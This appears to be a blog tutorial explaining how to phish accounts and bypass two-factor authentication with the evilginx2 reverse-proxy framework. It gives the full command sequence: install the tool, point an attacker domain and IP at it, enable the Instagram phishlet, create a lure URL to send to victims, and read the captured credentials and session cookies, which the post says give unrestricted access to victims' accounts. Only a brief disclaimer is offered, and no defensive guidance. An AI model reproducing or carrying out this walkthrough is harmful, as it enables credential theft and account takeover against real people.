Ads Area

How Hackers bypass Two Factor Authentication for Phishing using Evilginx2?

 

What is Modern Phishing and How is it different from the traditional one?


Although most security analysts and experts do not believe phishing or other social engineering attacks to be a danger to an organization, this is not always the case. Internal factors, in addition to known exploits, zero-day vulnerabilities, and security misconfigurations, render businesses vulnerable to attacks. One such method is the well-known Phishing Attack, which involves sending an attacker-hosted application's URL to a victim that contains the login page of popular legitimate web applications in the hope that the victim will enter his/her credentials. But wait a minute, don't popular applications like Facebook and Google have two-factor authentication?

In my defense, there are techniques to bypass them currently, one of which is Modern Phishing, which renders two-factor authentication ineffective. Nowadays, when apps use two-factor authentication techniques like OTP or Microsoft Authenticator, simply gaining an ID and a password from an attack isn't enough. There are a number of tools available that promise to execute modern phishing attacks, but let's focus on a well-known open-source tool, evilginx2.


How Evilginx2 Helps and Everything about it?

Evilginx2 is a man-in-the-middle attack architecture that can be used to phish login credentials as well as session cookies, allowing 2-factor authentication protection to be bypassed. But, before we get into its setup, let me warn you that the knowledge you get must never be used to inflict harm to an individual or an organization, and if that happens, neither we (thedecentshub) nor evilginx2 will be held liable.

Let us begin, so as a prerequisite, you must have any Linux-based operating system or environment installed on WSL or VM, such as Kali, Unix, Parrot, and so on. Now, one by one, install evilginx2 globally using the commands listed below.

sudo apt-get -y install git make
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo make install
sudo evilginx


Now that you have installed the tool and I assume you have also set up a domain, for example, attacker.com to point to your server with IP address 10.10.10.10, let's begin with the crazy and most amazing part. Configure your tool to connect to your server using the below commands.

config domain attacker.com
config ip 10.10.10.10


Phishlets are an essential part of evilginx2. These are the YAML files that contain the application's configurations for creating a phishing website. For the time being, Evilginx2 includes 20 phishlets by default for apps such as Amazon, Instagram, Paypal, and others. However, this does not limit you; you may construct your own YAML file for websites that are not on the list. This is super easy, but I'll go into more detail in another blog. Until then, every time evilginx2 is loaded, you may see all of your default phishlets.

Now, use the command below to enable the phishlet you wish to utilize. If no SSL/TLS certificate is detected for the host, it will immediately retrieve one.

phishlets enable instagram


Now that your new application is up, use the instructions below to configure a redirect URL for successful login and obtain the URL you need to share with your victim users.

lures create instagram
lures edit 0 redirect_url https://www.instagram.com
lures get-url 0

Distribute the URL and monitor the reaction on evilginx2. To examine all cookies and credentials gathered thus far, use the command "sessions." Use "sessions <id>" to acquire more insight. The cookies obtained can be used to acquire unrestricted access to the victim's account. Evilginx2 performs its duties efficiently, making every effort to keep the target unaware of the attack that is taking on behind his back.

Note: While Evilginx2 is running, it grabs cookies and executes the phishlets. If the session is interrupted, the phishlet stops operating. If you need to keep your application running while your secure shell is closed, utilize a screen or tmux session.

In case, you are stuck with your setup or need any solution, or you want more clarification on any topic, want to show us support or just wanna give us a suggestion. Drop us a comment down below or reach us through our mail id. Keep a watch out for our new blog, and until then, have a good life. Bye.



Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.